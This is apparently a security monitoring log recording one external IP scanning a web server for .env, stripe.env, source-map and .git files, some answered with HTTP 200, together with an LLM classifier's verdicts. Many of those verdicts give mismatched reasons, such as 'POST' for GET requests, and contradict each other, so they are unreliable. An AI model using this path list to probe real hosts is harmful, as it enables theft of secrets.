Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355452 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.992658462Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /conf/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355481 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.092845711Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /www/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355510 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.129886801Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /site/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355540 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.164590132Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /crm/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355597 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.208219896Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /local/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355631 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.215628362Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /apps/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355659 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.226651659Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /application/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355686 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.228029175Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /development/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355713 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.253106947Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /website/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355743 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.283561529Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /backup/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355772 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.307598347Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /old/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355802 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.372549864Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /storage/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355831 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.380693786Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /test/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355863 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.394020239Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /tests/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355893 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.412717162Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /rest/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355924 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.422462259Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /graphql/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355956 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.472453764Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /v1/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355985 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.493759708Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /v2/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356014 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.506541992Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /mail/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356044 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.558732644Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /database/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebK...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356072 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.565142888Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /db/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356107 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.572401615Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /tmp/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356195 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.588820982Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /var/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356223 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.596263141Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /kyc/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356256 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.606478186Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /.vscode/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356309 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.643813815Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /node_modules/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356341 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.704481122Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /config.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356367 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:02.721277153Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /api/config.env HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356405 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:02.724831795Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /api/shared/config.env HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356431 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:02.751706429Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /api/shared/config/config.env HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356461 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.775907260Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /config/stripe.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356488 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.788781487Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /.circleci/stripe.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Ap...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356513 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.889405604Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /config.js HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356539 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.893415255Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /stripe.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356565 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.899574300Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /main.js HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356594 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.907060086Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /env.js HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537....
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356620 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.958867818Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /app.js HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537....
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356645 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:02.967177685Z 185.177.72.60 - - [20/Mar/2026:15:16:02 +0000] "captain.admin.kovicloud.com" "GET /constants.js HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356672 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.017809993Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /bundle.js HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356712 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.084485027Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /main.js.map HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356771 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.088150467Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /index.js HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356799 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.123372084Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /@vite/client HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356827 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.140688575Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /__env.js HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356854 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.142231505Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /constants.js.map HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356881 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.148632091Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /env.js.map HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356915 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.189630721Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /vendor.js HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356943 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.233453931Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /env.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356971 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.294027339Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /index.js.map HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.356999 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.296131341Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /.vite/manifest.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) App...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.357027 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.301873054Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /__env.js.map HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.357081 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.371255358Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /vendor.js.map HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebK...
Mar 20 15:16:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:10.632747 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:16:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:10.632787 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to the environment file '/.env' via HTTP is commonly used to probe for sensitive configuration and is typically anomalous. Line=2026-03-20T15:15:58.891221263Z GET /.env 404 1.783 ms - 9
Mar 20 15:16:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:15.873675 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:16:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:15.873732 [analyzer] Source hint mismatch: LLM says "nginx http server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124245 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124283 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124347 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.446234015Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /.git/config HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124399 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.469230208Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /.git/HEAD HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
